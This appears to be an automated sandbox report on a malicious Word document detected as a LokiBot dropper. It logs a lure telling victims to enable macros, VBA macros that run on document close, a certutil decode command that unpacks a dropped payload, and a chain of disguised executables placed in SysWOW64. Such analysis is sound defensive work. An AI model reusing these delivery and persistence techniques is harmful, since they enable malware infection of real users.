Source: Yara match	File source: 12.2.dhcpcmonitor.exe.4f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.470000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.658540.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.msvcp120_clr0400.exe.2f8598.0.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe

Code function: 16_2_004725E0 CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptAcquireContextW,CryptGenKey,CryptCreateHash,GetProcessHeap,HeapFree,

16_2_004725E0

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000006.00000002.2250987083.000000000061D000.00000004.00000020.sdmp, type: MEMORY

Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing" from the yellow bar above. QNN q 2 Once you have enabled editing, please click
Source: Screenshot number: 4	Screenshot OCR: Enable content" on the yellow bar above. Em> "this document is completely safety to open Page: 1 o
Source: Document image extraction number: 0	Screenshot OCR: Enable editing' from the yellow bar 2 Once you have enabled editing, please click "Enable content'
Source: Document image extraction number: 0	Screenshot OCR: Enable content' on the yellow bar above. *this document is completely safety to open

Document contains an embedded VBA macro with suspicious strings

Source: sample1.doc	OLE, VBA macro line: Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
Source: sample1.doc	OLE, VBA macro line: Private Declare Function Sleep Lib "Kernel32" (ByVal One As Long) As Long

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00620400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	8_2_00620400
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003E0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	9_2_003E0400
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_00360400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	10_2_00360400
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_00320400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	11_2_00320400
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004E0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	12_2_004E0400
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_00280400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	13_2_00280400
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C10400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	14_2_01C10400
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003E0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	15_2_003E0400
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00460400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	16_2_00460400

Contains functionality to delete services

Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe

Code function: 9_2_003F8E80 CloseServiceHandle,OpenSCManagerW,DeleteService,OpenServiceW,OpenServiceW,CloseServiceHandle,

9_2_003F8E80

Creates files inside the system directory

Source: C:\Windows\System32\certutil.exe

File created: C:\Windows\cer69EA.tmp

Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\certutil.exe

File deleted: C:\Windows\cer69EA.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040314D	8_2_0040314D
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004052D4	8_2_004052D4
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00409350	8_2_00409350
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00406DA8	8_2_00406DA8
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_006478B0	8_2_006478B0
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00641C70	8_2_00641C70
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_006465E0	8_2_006465E0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F1C70	9_2_003F1C70
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F78B0	9_2_003F78B0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F65E0	9_2_003F65E0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F1C70	10_2_003F1C70
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F78B0	10_2_003F78B0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F65E0	10_2_003F65E0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_00331C70	11_2_00331C70
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_003378B0	11_2_003378B0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_003365E0	11_2_003365E0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F1C70	12_2_004F1C70
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F65E0	12_2_004F65E0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F78B0	12_2_004F78B0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_00291C70	13_2_00291C70
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_002978B0	13_2_002978B0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_002965E0	13_2_002965E0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C665E0	14_2_01C665E0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C678B0	14_2_01C678B0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C61C70	14_2_01C61C70
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F1C70	15_2_003F1C70
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F78B0	15_2_003F78B0
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F65E0	15_2_003F65E0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00471C70	16_2_00471C70
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_004765E0	16_2_004765E0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_004778B0	16_2_004778B0

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: sample1.doc	OLE, VBA macro line: Private Sub Document_Close()
Source: sample1.doc	OLE, VBA macro line: Form_Close
Source: sample1.doc	OLE, VBA macro line: Private Sub Form_Close()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Close	Name: Document_Close
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Form_Close	Name: Form_Close

Document contains embedded VBA macros

Source: sample1.doc

OLE indicator, VBA macros: true

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Ksh1.pdf FB07F875DC45E6045735513E75A83C50C78154851BD23A645D43EA853E6800AC

Yara signature match

Source: 00000006.00000002.2250987083.000000000061D000.00000004.00000020.sdmp, type: MEMORY

Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: tmp_e473b4.exe, 00000008.00000002.2255365676.000000000042A000.00000004.00020000.sdmp, normaliz.exe, 00000009.00000002.2261025209.000000000042A000.00000004.00020000.sdmp, mmcshext.exe, 0000000A.00000002.2265147822.000000000042A000.00000004.00020000.sdmp, ir50_qcx.exe, 0000000B.00000002.2269487904.000000000042A000.00000004.00020000.sdmp, dhcpcmonitor.exe, 0000000C.00000002.2273981722.000000000042A000.00000004.00020000.sdmp	Binary or memory string: @*\AC:\aseb\Aseb.vbp
Source: tmp_e473b4.exe, normaliz.exe, 00000009.00000000.2254785009.0000000000401000.00000020.00020000.sdmp, mmcshext.exe, 0000000A.00000002.2265125370.0000000000401000.00000020.00020000.sdmp, ir50_qcx.exe, 0000000B.00000002.2269466325.0000000000401000.00000020.00020000.sdmp, dhcpcmonitor.exe, 0000000C.00000002.2273952639.0000000000401000.00000020.00020000.sdmp	Binary or memory string: B*\AC:\aseb\Aseb.vbp

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@20/19@0/100

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	8_2_00648970
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	9_2_003F8970
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: OpenSCManagerW,OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	10_2_003F8970
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	11_2_00338970
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	12_2_004F8970
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	13_2_00298970
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	14_2_01C68970
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,	15_2_003F8970

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe

Code function: 16_2_00474C80 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,CloseHandle,CloseHandle,

16_2_00474C80

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

Code function: 8_2_00645040 ChangeServiceConfig2W,OpenServiceW,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,

8_2_00645040

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ample1.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRB76C.tmp

Jump to behavior

Source: sample1.doc

OLE indicator, Word Document stream: true

Source: sample1.doc

OLE document summary: title field not present or empty

Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.9.5.9.7.2...............#.......(d......................*.......q(.v............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............t.......<.......H...............#.......(d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .4.4.6.9.7.6.............#.......(d......................,.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............t.......<.......S...............#.......(d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................p.......(.P.............t.......<.......W...............#........3......................b.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............t.......<.......[...............#........3..............................................	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	WMI Queries: IWbemServices::ExecMethod - Win32_Process::create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	WMI Queries: IWbemServices::ExecMethod - Win32_Process::create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\certutil.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: sample1.doc	Virustotal: Detection: 57%
Source: sample1.doc	Metadefender: Detection: 45%
Source: sample1.doc	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\certutil.exe Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe C:\Users\user\AppData\Local\Temp/tmp_e473b4.exe
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process created: C:\Windows\SysWOW64\mfcm140\normaliz.exe C:\Windows\SysWOW64\mfcm140\normaliz.exe
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process created: C:\Windows\SysWOW64\clip\mmcshext.exe C:\Windows\SysWOW64\clip\mmcshext.exe
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process created: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe C:\Windows\SysWOW64\regedt32\ir50_qcx.exe
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process created: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process created: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process created: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe C:\Windows\SysWOW64\oleaccrc\TSChannel.exe
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process created: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe C:\Windows\SysWOW64\iprtrmgr\qdvd.exe
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process created: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process created: C:\Windows\SysWOW64\mfcm140\normaliz.exe C:\Windows\SysWOW64\mfcm140\normaliz.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process created: C:\Windows\SysWOW64\clip\mmcshext.exe C:\Windows\SysWOW64\clip\mmcshext.exe	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process created: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process created: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process created: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process created: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process created: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process created: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00404803 push ecx; iretd	8_2_004047EF
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00404021 push ecx; retf	8_2_00404037
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00408839 push esi; iretd	8_2_00408893
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040610E push ecx; retf	8_2_0040611B
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040A12E push ecx; iretd	8_2_0040A12F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004031D1 push ecx; iretd	8_2_00403233
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040721C pushad ; iretd	8_2_00407223
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040321E push ecx; iretd	8_2_00403233
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00403236 push ecx; iretd	8_2_00403287
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00405AE2 push ecx; ret	8_2_00405B3F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004062F6 push ebx; iretd	8_2_004062F7
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040AAF9 push esp; retf	8_2_0040AB17
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00403B4E push ecx; retf	8_2_00403B4F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00404B02 push ecx; ret	8_2_00404B03
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00403B35 push ecx; retf	8_2_00403B47
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004053DD push ecx; ret	8_2_004053E7
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00408464 push ecx; ret	8_2_0040847B
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00407C76 push ebp; retf	8_2_00407C78
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040A404 push ecx; ret	8_2_0040A497
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004074C5 push ecx; iretd	8_2_004074CF
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004044D5 push ecx; iretd	8_2_004044F3
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_004054B6 push ecx; retf	8_2_004054B7
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040450F push ecx; retf	8_2_00404523
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00404539 push ecx; retf	8_2_00404523
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00406DA8 push eax; retf	8_2_00406FAF
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040A646 push edx; iretd	8_2_0040A647
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00403E52 push eax; ret	8_2_00403E54
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00405655 push ecx; retf	8_2_0040565F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00407E7E push ecx; iretd	8_2_00407E7F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00409E0A push ecx; ret	8_2_00409E0B
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_0040869A push ecx; retf	8_2_0040869B

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	WMI Queries: IWbemServices::ExecMethod - Win32_Process::create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	WMI Queries: IWbemServices::ExecMethod - Win32_Process::create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Executable created and started: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Executable created and started: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Executable created and started: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Executable created and started: C:\Windows\SysWOW64\clip\mmcshext.exe	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Executable created and started: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Executable created and started: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Executable created and started: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Jump to behavior
